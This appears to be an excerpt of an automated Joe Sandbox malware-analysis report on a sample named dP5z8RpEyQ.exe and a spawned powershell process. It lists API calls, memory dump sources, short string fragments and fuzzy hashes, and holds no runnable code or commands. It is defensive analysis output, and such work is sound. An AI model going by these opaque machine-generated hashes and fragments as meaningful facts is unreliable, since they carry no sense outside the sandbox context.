                                                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\dP5z8RpEyQ.exe,C:\Users\user\Desktop\dP5z8RpEyQ.exe,80000000,00000003), ref: 00405AC7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharPrevlstrlen
                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                    • API String ID: 2709904686-1246513382
                                                                                                    • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                                    • Instruction ID: b470c799eb173815a0b66f2a5ec0288490d136ddbfbfb3d8272f9cf217b16711
                                                                                                    • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                                    • Instruction Fuzzy Hash: C5D0A7635089706FE303A2108C44B9F6A48DF17300F1D4462F081A2191C6784C428BFD
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BFA
                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C0B
                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 190613189-0
                                                                                                    • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                                    • Instruction ID: c18a7a17a862b3ccaab34bb7c38a9d703f10cc619688c1102a12456a902c3210
                                                                                                    • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                                    • Instruction Fuzzy Hash: 65F0F631208914FFDB12DFA4DD40D9EBBB8EF56354B2540B9E840FB210D674EE019BA8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2622680686.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7e3d3ac3148ac70cc838bdb3eab0c19f6f68e2f5be2798e0630822567b56c7e3
                                                                                                    • Instruction ID: 6a50d1bc35fa8820b6d64da311803ffd3c1ad0855686d3b9e880c06b5d2cabf1
                                                                                                    • Opcode Fuzzy Hash: 7e3d3ac3148ac70cc838bdb3eab0c19f6f68e2f5be2798e0630822567b56c7e3
                                                                                                    • Instruction Fuzzy Hash: 2F528F34B00219CFDB24CF64C9587ADBBB2EF85306F1444AAD84AA7355EB34AD86CF51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2622394643.0000000004E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E1D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_4e1d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 93e256b92243bd071c11a764fbed919cd32a3c429e0158e5dba040cf23125bc7
                                                                                                    • Instruction ID: e324d6e98f8e763f7c4b9be2210a5f9356b124595fca693461f38da6ae2182fb
                                                                                                    • Opcode Fuzzy Hash: 93e256b92243bd071c11a764fbed919cd32a3c429e0158e5dba040cf23125bc7
                                                                                                    • Instruction Fuzzy Hash: BB21F475684200DFCF05CF64D9C0B26BF65FB88318F24C5A9E9094A266C33AE456DBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$(ftl$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$x.ek$x.ek$-ek$-ek
                                                                                                    • API String ID: 0-3340470198
                                                                                                    • Opcode ID: a12a951a42646198aeba0267eea3ca6ca5b0e1343401271c53e720d9ebd556b0
                                                                                                    • Instruction ID: b52e974740e766c0f22e4cf5bdd1c94c60ca9e4185181bd05e06561f01d9d3a7
                                                                                                    • Opcode Fuzzy Hash: a12a951a42646198aeba0267eea3ca6ca5b0e1343401271c53e720d9ebd556b0
                                                                                                    • Instruction Fuzzy Hash: A472ADB0B012149FD750CB68C945FAABBB2EF85304F14C1A9E909AF395CB32DD85CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$(ftl$4'jq$4'jq$4'jq$4'jq$4ql$4ql$x.ek$x.ek$-ek
                                                                                                    • API String ID: 0-3862993
                                                                                                    • Opcode ID: 0f49ca474a8da62b6a1a74210f2c8f6d457311611675bdde0b63eb45e7688a50
                                                                                                    • Instruction ID: e05ea82ab1246e9b2a1b1ff47c5aa085d17bfaac7f92d554d46eafec91b7710f
                                                                                                    • Opcode Fuzzy Hash: 0f49ca474a8da62b6a1a74210f2c8f6d457311611675bdde0b63eb45e7688a50
                                                                                                    • Instruction Fuzzy Hash: A7924DB0B002189FD714DB18CD55FAABBB2FB85304F108595D909AB791CB72ED86CFA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$(ftl$4'jq$4'jq$4'jq$4'jq
                                                                                                    • API String ID: 0-918346762
                                                                                                    • Opcode ID: 572504ad43a5f6613247233dfe65bcd8a544795d1ce94793208a480d718e7d2b
                                                                                                    • Instruction ID: d987b2af85299aa9ad740548b0d879e44d0c793b311502400b03172638b260c4
                                                                                                    • Opcode Fuzzy Hash: 572504ad43a5f6613247233dfe65bcd8a544795d1ce94793208a480d718e7d2b
                                                                                                    • Instruction Fuzzy Hash: 04427BB0B41244AFD704CB58C954FAABBB2EF85308F15C468E905AF795CB72ED81CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq
                                                                                                    • API String ID: 0-1582633876
                                                                                                    • Opcode ID: 132b84485422ad10d6ea76c162cb95ac353b441ed6d92431580326ebc6d74487
                                                                                                    • Instruction ID: ea60401438183228ec2497d1e290a37c983b0164bd7191c23f4b3fbb719112ce
                                                                                                    • Opcode Fuzzy Hash: 132b84485422ad10d6ea76c162cb95ac353b441ed6d92431580326ebc6d74487
                                                                                                    • Instruction Fuzzy Hash: 8B32B0B0B462089FD714DB58C954BAABBB2FF85304F15C0A9E9059F791CB72EC81CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$4'jq$4'jq$x.ek$-ek
                                                                                                    • API String ID: 0-2575066576
                                                                                                    • Opcode ID: 1d37bcf65de8a290dd80808005b40bca60342b65dc7ef6fa6b50ecbfac0ca3c7
                                                                                                    • Instruction ID: 57b93963609fe93ea2deaad692cee41c146a9e4585e067652b309764ced79600
                                                                                                    • Opcode Fuzzy Hash: 1d37bcf65de8a290dd80808005b40bca60342b65dc7ef6fa6b50ecbfac0ca3c7
                                                                                                    • Instruction Fuzzy Hash: CDC1B1B0A012449FDB14DF58C944BAEBBB2EF86308F15D469D8016F395CB36ED85CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$4'jq$4ql$x.ek
                                                                                                    • API String ID: 0-2698665739
                                                                                                    • Opcode ID: e8d1ec63325c9c565f047c9ce332fc2fc6cc88bdafffac53ea2be1d2956af993
                                                                                                    • Instruction ID: 6d8c2e05359114f92e3b3e202d85e015a9a7738b1442805b53ccde35e324e8d2
                                                                                                    • Opcode Fuzzy Hash: e8d1ec63325c9c565f047c9ce332fc2fc6cc88bdafffac53ea2be1d2956af993
                                                                                                    • Instruction Fuzzy Hash: C7124BB0A01215DFD720CB18CD55BAABBB2FB85308F10D195D909AB791CB32ED85CFA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$4'jq$4ql$x.ek
                                                                                                    • API String ID: 0-2698665739
                                                                                                    • Opcode ID: 271b9de7533b43222c225b0b1a2be3f7e55b3229ff9ed36713b82ef9aaa31009
                                                                                                    • Instruction ID: ddb8a54c3ea7cd5d52e8e5b00e56b01324a21bba0757e14f9bfea37af5ce754e
                                                                                                    • Opcode Fuzzy Hash: 271b9de7533b43222c225b0b1a2be3f7e55b3229ff9ed36713b82ef9aaa31009
                                                                                                    • Instruction Fuzzy Hash: C2E14AB0A01219DFD720CB14CD95BAABBB2FB85308F10D195D909AB791CB36ED85CF91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$x.ek$-ek
                                                                                                    • API String ID: 0-637129865
                                                                                                    • Opcode ID: 7b86b74a3bd48774038c6b1d4a03fcd75abad011b2bf4df1b0cf4b20ad3833ce
                                                                                                    • Instruction ID: 21bb4e2c94582c3c1aa3dd79d1351c2db7789d50e47b896d9a5f22f3d66f7c0e
                                                                                                    • Opcode Fuzzy Hash: 7b86b74a3bd48774038c6b1d4a03fcd75abad011b2bf4df1b0cf4b20ad3833ce
                                                                                                    • Instruction Fuzzy Hash: B7527EB47012149FD750CB28C945FAABBB2FB85308F54C1A5E909AB391CB72ED81CF91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$x.ek$-ek
                                                                                                    • API String ID: 0-637129865
                                                                                                    • Opcode ID: 86780ba126d652acb096f2e2a15278d962fa6f8a4b28ccd02992824ecebd8578
                                                                                                    • Instruction ID: ab1224f213803400eaed61573daa830cc2fb5698c02933b8b202a4c224361bb5
                                                                                                    • Opcode Fuzzy Hash: 86780ba126d652acb096f2e2a15278d962fa6f8a4b28ccd02992824ecebd8578
                                                                                                    • Instruction Fuzzy Hash: C2528CB4A012149FD750CB58C985FAABBB2FB85308F14C1A5E909AF351CB32ED85CF91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$x.ek$-ek
                                                                                                    • API String ID: 0-637129865
                                                                                                    • Opcode ID: a7dc36af535bf66f5325e74d5e8cb5aeab08d05edabdb0d08ccb6672d9295318
                                                                                                    • Instruction ID: f828beb03ef22e3ef6f0c134a21eb0705818163d9d76f9c660841a1b144d113e
                                                                                                    • Opcode Fuzzy Hash: a7dc36af535bf66f5325e74d5e8cb5aeab08d05edabdb0d08ccb6672d9295318
                                                                                                    • Instruction Fuzzy Hash: 4A424BB07002149FD714DB18CD91FAABBB2FB89704F108595D919AB391CB72ED86CBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$h2gk
                                                                                                    • API String ID: 0-1686454285
                                                                                                    • Opcode ID: a6217fc69e5e3c5cf96be6ecd46dbcfc222181a736e3670e34cb4703ae82d508
                                                                                                    • Instruction ID: 3cfeff7806163fbe625336e7993c624c39e22c3b5c12c0267c044c889fa8fbe3
                                                                                                    • Opcode Fuzzy Hash: a6217fc69e5e3c5cf96be6ecd46dbcfc222181a736e3670e34cb4703ae82d508
                                                                                                    • Instruction Fuzzy Hash: 94026CB4B01208AFDB04DB58C954FA9BBB2FF85704F1580A9E9059F791CB72ED81CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $jq$$jq$$jq
                                                                                                    • API String ID: 0-3696375380
                                                                                                    • Opcode ID: 25731bf634913d060d25e5603d18e853377d8e23e1275fc8c16669bee96f8c4b
                                                                                                    • Instruction ID: 2f254a633211f438fd7013c479b30313b11ae1f2163cd0dc0c4b9c8591483ccc
                                                                                                    • Opcode Fuzzy Hash: 25731bf634913d060d25e5603d18e853377d8e23e1275fc8c16669bee96f8c4b
                                                                                                    • Instruction Fuzzy Hash: 264126B2B012269FDB149EAD89442BBF7F6EFC4314B14852AC815EB345DA32DD40C7E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq
                                                                                                    • API String ID: 0-1204115232
                                                                                                    • Opcode ID: 8bea43b5fff1a64a477caf395b8e92719a36ace77164e2ca58f1db37b6f6ee5e
                                                                                                    • Instruction ID: 5aec52d015c0750f9d2b81b5b3fded3959f0feda986ee775d3d2d2695e9e2611
                                                                                                    • Opcode Fuzzy Hash: 8bea43b5fff1a64a477caf395b8e92719a36ace77164e2ca58f1db37b6f6ee5e
                                                                                                    • Instruction Fuzzy Hash: 23125AB4A01245AFE704CF58C984FA9BBB2FF85308F158069E905AF795C772ED81CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq
                                                                                                    • API String ID: 0-1204115232
                                                                                                    • Opcode ID: b84a354a4697f6e61327f3fa1a69bda8971f11e662d4df39e7b41780ab473df8
                                                                                                    • Instruction ID: d1bc498b9832d56ee4c11b9e529e5f22b09f43fc24375f479826eb065d769036
                                                                                                    • Opcode Fuzzy Hash: b84a354a4697f6e61327f3fa1a69bda8971f11e662d4df39e7b41780ab473df8
                                                                                                    • Instruction Fuzzy Hash: AD027CB4A022099FDB14CF58C954FA9BBB2FF88704F15C099E905AB791C772ED81CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq
                                                                                                    • API String ID: 0-1204115232
                                                                                                    • Opcode ID: 01b36434c57bda1f69831020671e054205dd65a99b9866742556a6d07f3fe3d2
                                                                                                    • Instruction ID: 85333f6490ee666abe9fe4a1ca454ebe6fbe3d4cdf9cd13627e61c0546b7f560
                                                                                                    • Opcode Fuzzy Hash: 01b36434c57bda1f69831020671e054205dd65a99b9866742556a6d07f3fe3d2
                                                                                                    • Instruction Fuzzy Hash: 68617BF17092658FC716477C94542AABFA6AFC2214F1880BBD442CF252CA31CD85C7A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: x.ek
                                                                                                    • API String ID: 0-2146835383
                                                                                                    • Opcode ID: f789f467c805adc1a26acbfea8633e4b9b7ab6a3d6da849a8f85f9a6bbdbf120
                                                                                                    • Instruction ID: abbd8de5ba619f86b91960434723afd84705da3388790e3fd812823c4844e1fa
                                                                                                    • Opcode Fuzzy Hash: f789f467c805adc1a26acbfea8633e4b9b7ab6a3d6da849a8f85f9a6bbdbf120
                                                                                                    • Instruction Fuzzy Hash: 2C31C1B0B40214ABE704AB68C955FAF7AA3EF85304F10C464E9016F396CE76AD45CBE1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2622680686.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq
                                                                                                    • API String ID: 0-3676250632
                                                                                                    • Opcode ID: 10ed57e5fac0b4acc6a956b923a10b8b545e5bf55ea8188a9d1af1b3ae34f0cd
                                                                                                    • Instruction ID: 45be034380c33e9fef8fed7d6124aca166a39bfaa26de2e8d56993a4ca39c44b
                                                                                                    • Opcode Fuzzy Hash: 10ed57e5fac0b4acc6a956b923a10b8b545e5bf55ea8188a9d1af1b3ae34f0cd
                                                                                                    • Instruction Fuzzy Hash: B6017B303883401BE7199765AC40B6E3F67FFC1610F5405BDD4465B2E6CA64AC098351
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2622680686.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq
                                                                                                    • API String ID: 0-3676250632
                                                                                                    • Opcode ID: 85fba4c796cbf6c64eb27c6cf745737631750cd8aca08dd3572db1bbe46385f9
                                                                                                    • Instruction ID: 22d41eddcb8edb3ae41a1f24fab829737fcfcc911ef5a1c9e165ca0555c449d0
                                                                                                    • Opcode Fuzzy Hash: 85fba4c796cbf6c64eb27c6cf745737631750cd8aca08dd3572db1bbe46385f9
                                                                                                    • Instruction Fuzzy Hash: F3F0F63038430027E218AB66AC51F2F7A5BEFC4614F54097CE5065B3EACE60FD094294
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2622680686.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 99a350b5f9c46e1334542480e6dc854846025d0f516c70fc078bd4d937af8771
                                                                                                    • Instruction ID: b2b4332a605b4bc67b280f3afab8c64f57cef92a7146b90d41606f3495d7b9e3
                                                                                                    • Opcode Fuzzy Hash: 99a350b5f9c46e1334542480e6dc854846025d0f516c70fc078bd4d937af8771
                                                                                                    • Instruction Fuzzy Hash: 80C1BD75A002088FCB14EFA4D944A9EBBF6FF84315F118569E8069B365DB34FD4ACB80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2622680686.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e8bc025546e4e42a6ba8d737df94772aa08e49ad81af2367ade4b5d108fe8193
                                                                                                    • Instruction ID: 98b39e6968322b6ab14cda820d02a9bb5677cc45a9f3ee69b5ed4c5b3cf4b35b
                                                                                                    • Opcode Fuzzy Hash: e8bc025546e4e42a6ba8d737df94772aa08e49ad81af2367ade4b5d108fe8193
                                                                                                    • Instruction Fuzzy Hash: 35919D70A042458FCB06CF58C5949AEFBB1FF49311B2585AAD855DB3A5C735FC81CBA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2622680686.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eb216ad17c28546a5001a36d0429e57af2250ba12361d6ff770f5b279f49cc32
                                                                                                    • Instruction ID: 411a649dbce0e62f54e907d72e9c92b3aea31e44cbcb3bc96492c4386e5ad343
                                                                                                    • Opcode Fuzzy Hash: eb216ad17c28546a5001a36d0429e57af2250ba12361d6ff770f5b279f49cc32
                                                                                                    • Instruction Fuzzy Hash: 2171AB71A002098FDB14EFA8C880A9EBBF6FF85315F14C96AD415DB265DB35AC46CB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2622680686.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 31e6efc9fdb8f45e83e9a24d09da46d80ccaf8182db5fba6cc40f1847566b28c
                                                                                                    • Instruction ID: 734af790900a92e06a016280cba3033a30e779e8e5ea7405b0337bb2b00af552
                                                                                                    • Opcode Fuzzy Hash: 31e6efc9fdb8f45e83e9a24d09da46d80ccaf8182db5fba6cc40f1847566b28c
                                                                                                    • Instruction Fuzzy Hash: 90713871E002099FDB14EFB5D880AADBBF6FF88305F148469D412AB3A4DB35AD46CB50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2622680686.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: aaf51ad88a97eef96b2acd6ef8c6d1e8a1214d0ef0e4522ee41111cfb468e906
                                                                                                    • Instruction ID: 1c60f0c409b3266d8b45fd9420658237086f743db160a83848478120690d4948
                                                                                                    • Opcode Fuzzy Hash: aaf51ad88a97eef96b2acd6ef8c6d1e8a1214d0ef0e4522ee41111cfb468e906
                                                                                                    • Instruction Fuzzy Hash: 3841A130A002048FEB05DB79C5547AEBBF6EF89315F18C469DC45AB3A6DA34AC42CB61
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2622680686.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
